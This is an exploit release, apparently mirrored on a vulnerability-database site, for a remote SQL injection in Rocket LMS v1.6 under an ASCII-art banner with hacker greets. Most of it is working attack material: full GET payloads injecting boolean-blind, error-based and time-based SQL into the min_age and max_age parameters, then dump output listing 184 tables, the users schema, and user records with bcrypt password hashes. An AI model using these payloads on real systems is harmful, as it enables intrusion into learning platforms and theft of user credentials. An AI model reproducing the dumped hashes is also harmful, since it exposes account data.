`ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Exploits ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr β β :
β Website : rocket-soft.org β β Rocket LMS - Learning Management System β
β Vendor : RocketSoft β β β
β Software : Rocket LMS v 1.6 β β is an online course marketplace with a β
β Vuln Type: Remote SQL Injection β β pile of features that helps you to run β
β Method : GET β β your online education business easily β
β Impact : Database Access β β β
β β β β
ββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββββ
β B4nks-NET irc.b4nks.tk #unix ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β Typically used for remotely exploitable vulnerabilities that can lead to β
β system compromise. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Ivo @palaziv
CryptoJob (Twitter) twitter.com/CryptozJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2022 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
GET parameter 'min_age' is vulnerable
---
Parameter: min_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---
GET parameter 'max_age' is vulnerable
---
Parameter: max_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---
[+] Starting the Attack
[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: 'admin_learn'
[INFO] fetching tables for database: 'admin_learn'
Database: admin_learn
[184 tables]
+------------------------------------------------+
| groups |
| accounting |
| advertising_banners |
| advertising_banners_translations |
| affiliates |
| affiliates_codes |
| agora_history |
| badge_translations |
| badges |
| become_instructors |
| blog |
| blog_categories |
| blog_translations |
| bundle_filter_option |
| bundle_translations |
| bundle_webinars |
| bundles |
| cart |
| categories |
| category_translations |
| certificate_template_translations |
| certificates |
| certificates_templates |
| comments |
| comments_reports |
| contacts |
| course_forum_answers |
| course_forums |
| course_learning |
| course_noticeboard_status |
| course_noticeboards |
| delete_account_requests |
| discount_categories |
| discount_courses |
| discount_groups |
| discount_users |
| discounts |
| faq_translations |
| faqs |
| favorites |
| feature_webinar_translations |
| feature_webinars |
| file_translations |
| files |
| filter_option_translations |
| filter_options |
| filter_translations |
| filters |
| follows |
| forum_featured_topics |
| forum_recommended_topic_items |
| forum_recommended_topics |
| forum_topic_attachments |
| forum_topic_bookmarks |
| forum_topic_likes |
| forum_topic_posts |
| forum_topic_reports |
| forum_topics |
| forum_translations |
| forums |
| group_users |
| groups_registration_packages |
| home_sections |
| jazzcash_transactions |
| meeting_times |
| meetings |
| migrations |
| navbar_button_translations |
| navbar_buttons |
| newsletters |
| newsletters_history |
| noticeboards |
| noticeboards_status |
| notification_templates |
| notifications |
| notifications_status |
| offline_payments |
| order_items |
| orders |
| page_translations |
| pages |
| password_resets |
| payku_payments |
| payku_transactions |
| payment_channels |
| payouts |
| payu_transactions |
| permissions |
| prerequisites |
| product_categories |
| product_category_translations |
| product_discounts |
| product_faq_translations |
| product_faqs |
| product_file_translations |
| product_files |
| product_filter_option_translations |
| product_filter_options |
| product_filter_translations |
| product_filters |
| product_media |
| product_orders |
| product_reviews |
| product_selected_filter_options |
| product_selected_specification_multi_values |
| product_selected_specification_translations |
| product_selected_specifications |
| product_specification_categories |
| product_specification_multi_value_translations |
| product_specification_multi_values |
| product_specification_translations |
| product_specifications |
| product_translations |
| products |
| promotion_translations |
| promotions |
| purchases |
| quiz_question_translations |
| quiz_translations |
| quizzes |
| quizzes_questions |
| quizzes_questions_answer_translations |
| quizzes_questions_answers |
| quizzes_results |
| rating |
| regions |
| registration_packages |
| registration_packages_translations |
| reserve_meetings |
| rewards |
| rewards_accounting |
| roles |
| sales |
| sales_log |
| sections |
| session_reminds |
| session_translations |
| sessions |
| setting_translations |
| settings |
| special_offers |
| subscribe_reminds |
| subscribe_translations |
| subscribe_uses |
| subscribes |
| support_conversations |
| support_department_translations |
| support_departments |
| supports |
| tags |
| testimonial_translations |
| testimonials |
| text_lesson_translations |
| text_lessons |
| text_lessons_attachments |
| ticket_translations |
| ticket_users |
| tickets |
| trend_categories |
| users |
| users_badges |
| users_cookie_security |
| users_manual_purchase |
| users_metas |
| users_occupations |
| users_registration_packages |
| users_zoom_api |
| verifications |
| webinar_assignment_attachments |
| webinar_assignment_history |
| webinar_assignment_history_messages |
| webinar_assignment_translations |
| webinar_assignments |
| webinar_chapter_items |
| webinar_chapter_translations |
| webinar_chapters |
| webinar_extra_description_translations |
| webinar_extra_descriptions |
| webinar_filter_option |
| webinar_partner_teacher |
| webinar_reports |
| webinar_reviews |
| webinar_translations |
| webinars |
+------------------------------------------------+
[INFO] fetching columns for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[49 columns]
+--------------------+-------------------------------------+
| Column | Type |
+--------------------+-------------------------------------+
| language | varchar(255) |
| about | text |
| access_content | tinyint(1) |
| account_id | varchar(128) |
| account_type | varchar(128) |
| address | varchar(255) |
| affiliate | tinyint(1) |
| avatar | varchar(255) |
| avatar_settings | varchar(255) |
| ban | tinyint(1) |
| ban_end_at | int(10) unsigned |
| ban_start_at | int(10) unsigned |
| bio | varchar(128) |
| can_create_store | tinyint(1) |
| certificate | varchar(128) |
| city_id | int(10) unsigned |
| commission | int(10) unsigned |
| country_id | int(10) unsigned |
| cover_img | varchar(255) |
| created_at | int(11) |
| deleted_at | int(11) |
| district_id | int(10) unsigned |
| email | varchar(255) |
| facebook_id | varchar(255) |
| financial_approval | tinyint(1) |
| full_name | varchar(128) |
| google_id | varchar(255) |
| headline | varchar(255) |
| iban | varchar(128) |
| id | int(10) unsigned |
| identity_scan | varchar(128) |
| level_of_training | bit(3) |
| location | point |
| meeting_type | enum('all','in_person','online') |
| mobile | varchar(32) |
| newsletter | tinyint(1) |
| offline | tinyint(1) |
| offline_message | text |
| organ_id | int(11) |
| password | varchar(255) |
| province_id | int(10) unsigned |
| public_message | tinyint(1) |
| remember_token | varchar(255) |
| role_id | int(10) unsigned |
| role_name | varchar(64) |
| status | enum('active','pending','inactive') |
| timezone | varchar(255) |
| updated_at | int(11) |
| verified | tinyint(1) |
+--------------------+-------------------------------------+
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[4 entries]
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| id | account_id | account_type | email | password |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| 1 | NULL | NULL | [email protected] | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867 | NULL | NULL | [email protected] | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995 | NULL | NULL | [email protected] | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL | NULL | [email protected] | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
[-] Done
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation